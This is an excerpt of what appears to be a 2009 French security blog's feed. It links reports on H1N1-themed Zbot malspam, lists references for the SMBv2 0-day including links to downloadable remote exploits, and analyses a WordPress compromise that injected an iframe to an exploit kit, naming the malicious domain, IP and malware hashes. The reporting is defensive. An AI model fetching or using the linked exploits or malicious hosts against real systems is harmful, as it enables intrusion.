<p><a title="5767b2c6d84d87a47d12da03f4f376ad" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=798&amp;entry_id=58"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=5767b2c6d84d87a47d12da03f4f376ad';return true;" onmouseout="window.status='';return true;">5767b2c6d84d87a47d12da03f4f376ad</a> : <a title="2009.12.02 07:53:47 (UTC) - 18/40 (45%)" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=799&amp;entry_id=58"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/4f1a5551a5fec27950ad99b6c63d568c7c712577121e6b1aa4cdf1ec7549c227-1259740427';return true;" onmouseout="window.status='';return true;">2009.12.02 07:53:47 (UTC) - 18/40 (45%)</a><br /> </p> <u>Sujets relatifs</u>:<br /> 
- <a href="http://mad.internetpol.fr/exit.php?url_id=800&amp;entry_id=58"  onmouseover="window.status='http://www.avertlabs.com/research/blog/index.php/2009/12/01/h1n1-vaccination-profile-a-path-to-infection/';return true;" onmouseout="window.status='';return true;" target="_blank" title="H1N1 Vaccination Profile – A path to infection">H1N1 Vaccination Profile – A path to infection</a> ( Adam Wosotowsky, (McAfee Labs), December 1st, 2009 )<br />- <a title="Zbot's Launching of State Vaccination H1N1 Program" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=815&amp;entry_id=58"  onmouseover="window.status='http://community.ca.com/blogs/securityadvisor/archive/2009/12/01/zbot-s-launching-of-state-quot-vaccination-quot-h1n1-program.aspx';return true;" onmouseout="window.status='';return true;">Zbot's Launching of State &quot;Vaccination&quot; H1N1 Program</a> ( Mary Grace Gabriel (CA Community), December 1st, 2009 )<br />- <a title="Malware seeding campaign leveraging vaccination profiles for the H1N1 virus" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=806&amp;entry_id=58"  onmouseover="window.status='http://blog.fortinet.com/malware-seeding-campaign-leveraging-vaccination-profiles-for-the-h1n1-virus/';return true;" onmouseout="window.status='';return true;">Malware seeding campaign leveraging vaccination profiles for the H1N1 virus</a> ( Karine de Ponteves (Fortinet), December 1, 2009 )<br />- <a title="Bots Using H1N1 Fear to Distribute Malware" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=816&amp;entry_id=58"  onmouseover="window.status='http://blog.appriver.com/2009/12/bots-using-h1n1-to-distribute-malware.html';return true;" onmouseout="window.status='';return true;">Bots Using H1N1 Fear to Distribute Malware</a> ( Troy Gill (AppRiver), December 1, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=820&amp;entry_id=58"  onmouseover="window.status='http://www.m86security.com/trace/traceitem.asp?article=1201';return true;" onmouseout="window.status='';return true;" target="_blank" title="Pushdo Now Delivering Flu Vaccinations">Pushdo Now Delivering Flu Vaccinations</a> ( Gavin Neale (M86 Security), December 1, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=809&amp;entry_id=58"  onmouseover="window.status='http://www.mysonicwall.com/SonicAlert/searchresults.aspx?ev=article';return true;" onmouseout="window.status='';return true;" target="_blank" title="SonicWALL Security Center : Fake CDC H1N1 program - New ZBot variant">Fake CDC H1N1 program - New ZBot variant</a> ( SonicWALL, December 1, 2009 )<br />- <a title="Fake Zbot Site Poses as CDC H1N1 Flu Vaccine Info" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=812&amp;entry_id=58"  onmouseover="window.status='http://blog.webroot.com/2009/12/01/fake-zbot-site-poses-as-h1n1-flu-vaccine-info/';return true;" onmouseout="window.status='';return true;">Fake Zbot Site Poses as CDC H1N1 Flu Vaccine Info </a>( Andrew Brandt (Webroot), December 1, 2009 )<br />- <a title="Zeus Trojan Catches Swine Flu" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=810&amp;entry_id=58"  onmouseover="window.status='http://www.symantec.com/connect/blogs/zeus-trojan-catches-swine-flu';return true;" onmouseout="window.status='';return true;">Zeus Trojan Catches Swine Flu</a> ( Hon Lau (Symantec), December 1st, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=804&amp;entry_id=58"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Dancho Danchev - Pushdo Injecting Bogus Swine Flu Vaccine">Pushdo Injecting Bogus Swine Flu Vaccine</a> ( Dancho Danchev, December 2, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=805&amp;entry_id=58"  onmouseover="window.status='http://www.sophos.com/blogs/sophoslabs/?p=7701';return true;" onmouseout="window.status='';return true;" target="_blank" title="SOPHOS LABS - H1N1 vaccination profile malware">H1N1 vaccination profile malware</a> ( SavioL (Sophos Labs), December 2, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=818&amp;entry_id=58"  onmouseover="window.status='http://isc.sans.org/diary.html?storyid=7678';return true;" onmouseout="window.status='';return true;" target="_blank" title="SPAM and Malware taking advantage of H1N1 concerns">SPAM and Malware taking advantage of H1N1 concerns</a> ( Rob VandenBrink (ISC SANS), December 2, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=814&amp;entry_id=58"  onmouseover="window.status='http://www.us-cert.gov/current/index.html#h1n1_malware_campaign_circulating';return true;" onmouseout="window.status='';return true;" target="_blank" title="US-CERT.GOV - H1N1 Malware Campaign Circulating">H1N1 Malware Campaign Circulating</a> ( US-CERT.GOV, December 2, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=823&amp;entry_id=58"  onmouseover="window.status='http://pandalabs.pandasecurity.com/archive/CDC-H1N1-Malspam-Campaign.aspx';return true;" onmouseout="window.status='';return true;" title="PandaLabs - CDC H1N1 Malspam Campaign">CDC H1N1 Malspam Campaign</a> ( Sean-Paul Correll (PandaLabs), December 2, 2009 )<br /><br /> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/57-Info-MalwareURL-soffre-un-nouveau-design.html" rel="alternate" title="Info: MalwareURL s'offre un nouveau design" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-09-17T13:40:00Z</published>
        <updated>2009-09-17T13:18:00Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=57</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=57</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/57-guid.html</id>
        <title type="html">Info: MalwareURL s'offre un nouveau design</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>L'équipe de <span style="color: #b41616;"><span style="font-weight: bold;">MalwareURL</span></span> créer la surprise ! </p> 
<p><img src="http://mad.internetpol.fr/imgupz/murl.gif" alt="MalwareURL *New Design*" /></p> <p> </p> 
<p><div class="bb-code-title">About</div><div class="bb-quote">The MalwareURL Team is a group of Internet security experts dedicated to fighting malware, Trojans and a multitude of other web-related threats. Our database is built-up using proprietary software and analytic techniques to locate, assess and monitor suspected sources of web criminality. We provide invaluable and up-to-date information to everyone from interested individuals to the world's leading Internet security organizations. Your use of this web site constitutes agreement to all <a href="http://mad.internetpol.fr/exit.php?url_id=780&amp;entry_id=57"  onmouseover="window.status='http://www.malwareurl.com/terms.php';return true;" onmouseout="window.status='';return true;" target="_blank" title="malwareurl.com : Terms and Conditions">Terms and Conditions</a>. If you intend to use our lists in a commercial product or service, please contact us for licensing information.</div></p> 
<p>Leur <a href="http://mad.internetpol.fr/exit.php?url_id=781&amp;entry_id=57"  onmouseover="window.status='http://www.malwareurl.com/listing-urls.php';return true;" onmouseout="window.status='';return true;" target="_blank" title="MalwareURL Database">base de données</a> ouverte offre des informations très utiles au quotidien et nous n'avons pas souvent l'occasion de les remercier alors <font size="3"><span style="font-weight: bold;">MERCI</span></font> !<br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/56-0-DAY-SMBv2-BSoD-Remote-Exploit-Windows-Vista,-Server-2008-7.html" rel="alternate" title="0-DAY SMBv2: BSoD &amp; Remote Exploit - Windows Vista, Server 2008 &amp; 7" />
        <author>
            <name>Matt</name>
                    </author>
    
        <published>2009-09-08T11:37:00Z</published>
        <updated>2009-09-16T22:36:24Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=56</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=56</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/56-guid.html</id>
        <title type="html">0-DAY SMBv2: BSoD &amp; Remote Exploit - Windows Vista, Server 2008 &amp; 7</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <img alt="SMB2 NEGOTIATE EXPLOIT, STRANGE..." src="http://mad.internetpol.fr/imgupz/artbsod.jpg" /> <p> </p> 
<p> <br /><a title="Wikipedia: BSOD" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=763&amp;entry_id=56"  onmouseover="window.status='http://fr.wikipedia.org/wiki/%C3%89cran_bleu_de_la_mort';return true;" onmouseout="window.status='';return true;">BSOD</a> / Remote Code Execution / Local Privilege Escalation<br /><br /><u>Références techniques</u>:<br />
- <a href="http://mad.internetpol.fr/exit.php?url_id=755&amp;entry_id=56"  onmouseover="window.status='http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D">Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D</a>. ( Laurent Gaffié - 7 septembre 2009 )<br />
- <a href="http://mad.internetpol.fr/exit.php?url_id=756&amp;entry_id=56"  onmouseover="window.status='http://blog.48bits.com/?p=510';return true;" onmouseout="window.status='';return true;" target="_blank" title="Acerca del BSOD de srv2.sys">Acerca del BSOD de srv2.sys</a> ( Ruben Santamarta (<em>48Bits</em>) - 8 septembre 2009 )<br />
- <a href="http://mad.internetpol.fr/exit.php?url_id=757&amp;entry_id=56"  onmouseover="window.status='http://www.reversemode.com/index.php?option=com_mamblog&amp;amp;Itemid=15&amp;amp;task=show&amp;amp;action=view&amp;amp;id=64&amp;amp;Itemid=15';return true;" onmouseout="window.status='';return true;" target="_blank" title="reversemode - SMB2.0 Negotiate BSOD Laurent Gaffié">Regarding SMB2.0 Negotiate BSOD published by Laurent Gaffié</a> ( Rubén (<em>Reverse Mode</em>), 8 septembre 2009 )<br />
- <a href="http://mad.internetpol.fr/exit.php?url_id=758&amp;entry_id=56"  onmouseover="window.status='http://isc.sans.org/diary.html?storyid=7093';return true;" onmouseout="window.status='';return true;" target="_blank" title="Vista/2008/Windows 7 SMB2 BSOD 0Day">Vista/2008/Windows 7 SMB2 BSOD 0Day</a> ( Guy Bruneau (<em>ISC SANS</em>), 8 septembre 2009 )<br />- <a title="cert-lexsi : bsod et plus encore..." target="_blank" href="url=http://cert.lexsi.com/weblog/index.php/2009/09/08/333-bsod-et-plus-encore">BSOD ... et plus encore</a> ( Fabien PERIGAUD (<em>CERT-LEXSI</em>), 8 septembre 2009 )<br />
- <a title="It’s ba-a-a-ack: Blue Screen of Death" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=760&amp;entry_id=56"  onmouseover="window.status='http://sunbeltblog.blogspot.com/2009/09/its-ba-a-ack-blue-screen-of-death.html';return true;" onmouseout="window.status='';return true;">It’s ba-a-a-ack: Blue Screen of Death</a> ( Tom Kelchner (<em>Sunbelt Software</em>), 8 septembre 2009 )<br />- <a title="MetaSploit - smb2_negotiate_pidhigh.rb" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=761&amp;entry_id=56"  onmouseover="window.status='http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/dos/windows/smb/smb2_negotiate_pidhigh.rb';return true;" onmouseout="window.status='';return true;">Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference</a> ( <em>Metasploit</em>, 8 septembre 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=762&amp;entry_id=56"  onmouseover="window.status='http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm';return true;" onmouseout="window.status='';return true;" target="_blank" title="Petri - How to Disable SMB 2.0 on Windows Vista/2008">How to Disable SMB 2.0 on Windows Vista/2008</a> ( Daniel Petri (<em>Petri IT Knowledgebase</em>), 8 septembre 2009 )<br />-&#160;<span style="text-decoration: underline;"></span><a href="http://mad.internetpol.fr/exit.php?url_id=775&amp;entry_id=56"  onmouseover="window.status='http://www.microsoft.com/technet/security/advisory/975497.mspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Microsoft Security Advisory (975497) - Vulnerabilities in SMB Could Allow Remote Code Execution">MSA (975497) - Vulnerabilities in SMB Could Allow Remote Code Execution</a> ( TechNet Security, 8 septembre 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=769&amp;entry_id=56"  onmouseover="window.status='http://www.securityfocus.com/brief/1009';return true;" onmouseout="window.status='';return true;" target="_blank" title="Robert Lemos, SecurityFocus - Serious security bug found in Windows Vista">Serious security bug found in Windows Vista</a> ( Robert Lemos (<em>SecurityFocus</em>), 8 septembre 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=772&amp;entry_id=56"  onmouseover="window.status='https://www.immunityinc.com/downloads/immpartners/smb2_negotiate.tgz';return true;" onmouseout="window.status='';return true;" target="_blank" title="smb2_negotiate.tgz - SMB2 Negotiate Vulnerability Proof of Concept">SMB2 Negotiate Vulnerability Proof of Concept</a> ( <span style="font-style: italic;">Immunity CANVAS</span>, 9 septembre, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=776&amp;entry_id=56"  onmouseover="window.status='http://lastwatchdog.com/smb2-zero-day-flaw-expose-vista-pcs-conficker-like/';return true;" onmouseout="window.status='';return true;" target="_blank" title="lastwatchdog.com - SMB2 zero-day flaw could expose Vista PCs to Conficker-like worm attack">SMB2 0-day flaw could expose Vista PCs to Conficker-like worm attack</a> ( Byron Acohido (<em>TheLastWatchdog</em>), 9 septembre 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=772&amp;entry_id=56"  onmouseover="window.status='https://www.immunityinc.com/downloads/immpartners/smb2_negotiate.tgz';return true;" onmouseout="window.status='';return true;" target="_blank" title="smb2_negotiate.tgz - Local Exploit for the SMB2 Negotiate Vulnerability (x86)">Local Exploit for the SMB2 Negotiate Vulnerability (x86)</a> ( <span style="font-style: italic;">Immunity CANVAS</span>, 14 septembre, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=773&amp;entry_id=56"  onmouseover="window.status='https://www.immunityinc.com/downloads/immpartners/smb2_negotiate_remote.tgz';return true;" onmouseout="window.status='';return true;" target="_blank" title="smb2_negotiate_remote.tgz - Remote Exploit for the SMB2 Negotiate Vulnerability (x86)">Remote Exploit for the SMB2 Negotiate Vulnerability (x86)</a> ( <span style="font-style: italic;">Immunity CANVAS</span>, 16 septembre, 2009 )<br /> - <a href="http://mad.internetpol.fr/exit.php?url_id=774&amp;entry_id=56"  onmouseover="window.status='http://isc.sans.org/diary.html?storyid=7141';return true;" onmouseout="window.status='';return true;" target="_blank" title="ISC SANS : SMB2 remote exploit released">SMB2 remote exploit released</a> ( Bojan Zdrnja (<span style="font-style: italic;">ISC SANS)</span>, 16 septembre, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=777&amp;entry_id=56"  onmouseover="window.status='http://www.immunityinc.com/documentation/smb2.swf';return true;" onmouseout="window.status='';return true;" target="_blank" title="SMBv2 Exploit Video">SMBv2 Remote Exploit Video Demo</a> ( <span style="font-style: italic;">Immunity CANVAS</span>, 16 septembre, 2009 )</p> 
<p> <br /></p> 
<p> </p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/55-Attaques-Mettez-a-jour-vos-WordPress-rapidement.html" rel="alternate" title="Attaques: Mettez à jour vos WordPress rapidement" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-09-07T14:36:00Z</published>
        <updated>2009-09-09T15:01:13Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=55</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=55</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/55-guid.html</id>
        <title type="html">Attaques: Mettez à jour vos WordPress rapidement</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p><img alt="Piratage, Incident, Injection, Blog de Jean-Luc Melenchon" src="http://mad.internetpol.fr/imgupz/blog_de_jean-luc_melenchon.gif" /></p> 
<p>&#160;Clarifions bien la situation dès le départ. Cet incident ne cible pas spécialement <a title="Wikipedia: Jean-Luc Mélenchon" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=723&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Jean-Luc_M%C3%A9lenchon';return true;" onmouseout="window.status='';return true;">Jean-Luc Mélenchon</a> : président du <a title="Wikipedia: Parti de gauche" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=725&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Parti_de_gauche_%28France%29';return true;" onmouseout="window.status='';return true;">Parti de Gauche</a> (<a title="Wikipedia: Parti de gauche" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=725&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Parti_de_gauche_%28France%29';return true;" onmouseout="window.status='';return true;">PG</a>) , ces attaques de masse frappent systématiquement les systèmes de gestion de contenu (<a title="Wikipedia: CMS" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=726&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Syst%C3%A8me_de_gestion_de_contenu';return true;" onmouseout="window.status='';return true;"><em>CMS</em></a>) vulnérables et aux premiers abords ce blog à l'air de fonctionner sous WordPress 2.3.2 alors que la <a title="WordPress" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=727&amp;entry_id=55"  onmouseover="window.status='http://wordpress.org/download/';return true;" onmouseout="window.status='';return true;">version stable</a> correspond à la 2.8.4 ! (( *edit: de nouvelles informations indiquent que toutes les versions étaient vulnérables, lire <a title="Old WordPress Versions Under Attack" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=752&amp;entry_id=55"  onmouseover="window.status='http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/';return true;" onmouseout="window.status='';return true;">Old WordPress Versions Under Attack</a> ( September 4, 2009 ) et <a href="http://mad.internetpol.fr/exit.php?url_id=750&amp;entry_id=55"  onmouseover="window.status='http://wordpress.org/development/2009/09/keep-wordpress-secure/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Upgrade Now ! Keep Wordpress Secure - Development-Security">How to Keep WordPress Secure: &quot;The tactics are new, but the strategy is not..&quot;</a> ( Matt, September 5, 2009 )) - Pour vous protéger, nous vous recommandons l'utilisation du plugin <a href="http://mad.internetpol.fr/exit.php?url_id=753&amp;entry_id=55"  onmouseover="window.status='http://wordpress.org/extend/plugins/bad-behavior/';return true;" onmouseout="window.status='';return true;" target="_blank" title="WordPress Plugin: Bad Behavior">Bad Behavior</a>.<br /></p> 
<p> A l'heure où les vives discussions politiques reprennent en France sur le très controversé projet de loi, <a title="Wikipedia: HADOPI law" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=728&amp;entry_id=55"  onmouseover="window.status='http://en.wikipedia.org/wiki/HADOPI_law';return true;" onmouseout="window.status='';return true;">HADOPI</a>, je me permet de soulever la question suivante malgré le fait que j'avais décidé de ne pas participer aux débats pour les mêmes raisons exposées par <a title="Zythom, informaticien expert judiciaire" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=729&amp;entry_id=55"  onmouseover="window.status='http://zythom.blogspot.com/2009/06/pourquoi-je-ne-parlerai-pas-dhadopi.html';return true;" onmouseout="window.status='';return true;">Zythom</a>.&#160;Imaginons que l'attaque du site de <a title="Wikipedia: Jean-Luc Mélenchon" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=723&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Jean-Luc_M%C3%A9lenchon';return true;" onmouseout="window.status='';return true;">Jean-Luc Mélenchon</a> avait eu pour objectif l'installation de dispositifs permettant aux pirates informatiques de s'introduire sur les ordinateurs des visiteurs afin de s'en servir comme relais et ainsi favoriser une diffusion illégale d'œuvres numériques. Voici un extrait tiré du journal  <a title="Wikipedia : LeMonde" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=730&amp;entry_id=55"  onmouseover="window.status='http://en.wikipedia.org/wiki/Le_Monde';return true;" onmouseout="window.status='';return true;">LeMonde</a>.</p> 
<p><div class="bb-code-title">HADOPI</div><div class="bb-quote">C'est à partir du 14 septembre que le texte du projet de loi relatif à la protection pénale de la propriété littéraire et artistique sur Internet (dit Hadopi II) devrait être soumis à un vote solennel, lors de la reprise des travaux du Parlement.<br /><br />Selon ce texte, &quot;des agents habilités et assermentés devant l'autorité judiciaire&quot; constateront les faits. Les petites infractions pourront être traitées par ordonnance pénale, procédure simplifiée déjà utilisée dans les excès de vitesse automobile, par exemple. Les cas plus importants - mais le texte reste flou sur la limite entre petites et grandes infractions - seront traités au tribunal correctionnel, à juge unique (au lieu de trois juges). <font size="2">Une <u>amende de 1 500 euros</u> pourra être exigée ; s'il y a poursuite pour contrefaçon, ça sera une <u>amende de 300 000 euros et deux ans d'emprisonnemen</u>t.</font><br /><br />L<u>'obligation pour l'usager de sécuriser la connexion Internet</u> reste un point délicat : si l'adresse d'un utilisateur apparaît sur un réseau pirate, c'est l'abonné titulaire de la ligne qui sera exposé aux poursuites, qu'il ait ou non piraté. Une notion de &quot;<strong>négligence caractérisée</strong>&quot; qui devrait à nouveau faire débat.</div>source: <a href="http://mad.internetpol.fr/exit.php?url_id=731&amp;entry_id=55" title="http://www.lemonde.fr/web/recherche_breve/1,13-0,37-1095688,0.html"  onmouseover="window.status='http://www.lemonde.fr/web/recherche_breve/1,13-0,37-1095688,0.html';return true;" onmouseout="window.status='';return true;" target="_blank" class="bb-url">Le texte français revient au Parlement le 14 septembre</a></p> 
<p>Autre scénario: l'intrusion aurait pu permettre l'installation silencieuse de
dispositifs furtifs spécialement conçus pour nuire aux individus ; par exemple, simuler le comportement d'un utilisateur qui télécharge illégalement (* <em>hacking-as-a-service</em>). Négligences caractérisées ? Si oui, de la part de qui ? Est-ce le responsable légal du site internet ou le visiteur qui n'avait pas ses applications à jour ? Comment se défendre et apporter les preuves de son innocence surtout quand
on a conscience qu'un juge n'a que quelques minutes pour traiter un
dossier ? J'entends déjà au loin les voix s'élever,.. hérésie ! cessez vos inepties ! Vous pensez peut être que ce méli-mélo entre cet incident et l'actualité n'a pas lieu d'être ? C'est possible mais en même temps, si j'arrive à vous réveiller sur l'absurdité de la &quot;<u>négligence caractérisée</u>&quot;, pourquoi pas. Et puis ça ne sera jamais pire que les comparaisons inexactes ou les <a title="Pare-Feu Open Office" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=732&amp;entry_id=55"  onmouseover="window.status='http://video.google.fr/videosearch?q=Pare-Feu+Open+Office';return true;" onmouseout="window.status='';return true;">amalgames burlesques</a> de nos politiciens. Avez-vous oublié l'affaire <a title="Cedric Pernet, Alex Eckelberry, Sunbelt Software - Le calvaire de Julie Amero" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=733&amp;entry_id=55"  onmouseover="window.status='http://bl0g.cedricpernet.net/post/2008/11/25/Julie-Amero-enfin-libre';return true;" onmouseout="window.status='';return true;">Julie Amero</a> ? Ces scénarios sont tout à fait plausibles et je ne semble pas être le seul à le penser de la sorte &quot;<a title="paperblog.fr - Hadopi 2, l'avis d'un expert" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=734&amp;entry_id=55"  onmouseover="window.status='http://www.paperblog.fr/2112741/hadopi-2-l-avis-d-un-expert-droit-de-reponse/';return true;" onmouseout="window.status='';return true;">Hadopi 2, l'avis d'un expert (droit de réponse)</a>&quot;. Vous avez raison, mon imagination est débordante mais croyez-moi nous sommes bien loin de celle des cybercriminels quand il s'agit de gagner de l'argent...&#160;</p> 
<p><br /></p> <p> </p> 
<p> </p> 
<p>Notre système SecuGate a enregistré l'alerte <em>Dimanche 6 Septembre à 12:09:10:07 GTM+1</em><br />Ci-dessous, le code ayant été injecté en fin de page.<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/jean-luc-melenchon.gif" /></p> 
<p> </p> 
<p>&#160;Une fois décodé, on constate qu'il s'agit d'une iFrame pointant sur un JavaScript malveillant.<br /></p> 
<p> </p> 
<p><img src="http://mad.internetpol.fr/imgupz/jean-luc-melenchon.fr_decoded.gif" /></p>


Certains détails nous indiquent rapidement que ces pirates informatiques utilisent la dernière version du kit <a href="http://mad.internetpol.fr/exit.php?url_id=736&amp;entry_id=55"  onmouseover="window.status='http://mipistus.blogspot.com/2009/08/liberty-exploit-system-otra-alternativa.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Liberty Exploit System">Liberty Exploit System</a>.











































<address> 
<p>DNS: <strong><span style="color: #a50a0a;">SEARRA-DITOL.CN</span></strong> - IP:&#160; : <strong><span style="color: #a50a0a;">61.235.117.72</span></strong><br />Organization: Justin Dickerson LTD (justin_dickerson<em>@</em>ymail.com)<br />Registration: 2009-09-04 00:41<br />Expiration: 2010-09-04 00:41</p> 
<p>CRGdSzS - 61.235.117.0 - 61.235.117.255<br />China Railcom Guangdong Shenzhen Subbranch<br />Telecommunication Company<br />Shenzhen City,Guangdong Province <br /></p> 
</address> 
<p>Au moment d'accéder au site compromis, une batterie d'exploits va de manière transparente, sonder la présence de certains composants vulnérables et tenter de les exploiter ; par exemple Adobe Reader et Adobe Flash. Si l'ordinateur est vulnérable le kit téléchargera et exécutera un programme malveillant ( MD5: <a title="Rapport TE : de194af65e555bf8fcf2b235092e40e1" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=737&amp;entry_id=55"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=de194af65e555bf8fcf2b235092e40e1';return true;" onmouseout="window.status='';return true;">de194af65e555bf8fcf2b235092e40e1</a> / SHA1: <a title="Google : 7a74204814bcaa6c6b2ebc0d724313fa7e7fd3f2" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=738&amp;entry_id=55"  onmouseover="window.status='http://www.google.com/search?q=7a74204814bcaa6c6b2ebc0d724313fa7e7fd3f2';return true;" onmouseout="window.status='';return true;">7a74204814bcaa6c6b2ebc0d724313fa7e7fd3f2</a>)à l'insu de son propriétaire. (<a title="VirusTotal : 7a74204814bcaa6c6b2ebc0d724313fa7e7fd3f2" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=739&amp;entry_id=55"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/dabc9674c50e4008be3c28b8257328e40361585aa8c89012d73ff56fe49da480-1252246587';return true;" onmouseout="window.status='';return true;">2009.09.06 14:16:27 (UTC) - 5/41 (12.20%)</a>) La date à laquelle ce fichier a été envoyé sur le serveur chinois correspond au <em>4 Septembre 2009 à 13:21:41 GMT</em>. Notons que la date à laquelle la signature &quot;<a title="Trojan.Win32.Tdss.aqgp" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=740&amp;entry_id=55"  onmouseover="window.status='http://www.viruslist.com/en/find?words=Trojan.Win32.Tdss.aqgp';return true;" onmouseout="window.status='';return true;">Trojan.Win32.Tdss.aqgp</a>&quot; a été ajoutée à la base de l'éditeur russe Kaspersky correspond au 6 Septembre de même pour <a href="http://mad.internetpol.fr/exit.php?url_id=751&amp;entry_id=55"  onmouseover="window.status='http://www.malware.com.br/cgi/search.pl?id=VHJvamFuLldpbjMyLlRkc3MuYXFncA==';return true;" onmouseout="window.status='';return true;" target="_blank" title="MalwarePatrol -">MalwarePatrol</a>. Heureusement pour les personnes infectées, la désignation &quot;Tdss&quot; ne correspond pas au <a href="http://mad.internetpol.fr/exit.php?url_id=741&amp;entry_id=55"  onmouseover="window.status='http://www.esagelab.com/files/AlisaS-VBMay09.pdf';return true;" onmouseout="window.status='';return true;" target="_blank" title="eSage Lab - Paper: AlisaS-VBMay09.pdf">[PDF] TDSS ROOTKIT</a> ! (Mai 2009, <a href="http://mad.internetpol.fr/exit.php?url_id=742&amp;entry_id=55"  onmouseover="window.status='http://www.virusbtn.com/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Virus Bulletin">Virus Bulletin</a> - <em>Alisa Shevchenko - eSage Lab, Russia</em>) Ici, il s'agit de <a title="PC Antispyware 2010" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=743&amp;entry_id=55"  onmouseover="window.status='http://siri-urz.blogspot.com/2009/08/pc-antispyware-2010.html';return true;" onmouseout="window.status='';return true;"><strong>PC Antispyware 2010</strong></a>, un faux logiciel de sécurité de la famille <strong><a title="siri-urz - s!ri blog : Braviax" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=744&amp;entry_id=55"  onmouseover="window.status='http://siri-urz.blogspot.com/search/label/Braviax';return true;" onmouseout="window.status='';return true;">Braviax</a></strong>.<br /></p> 
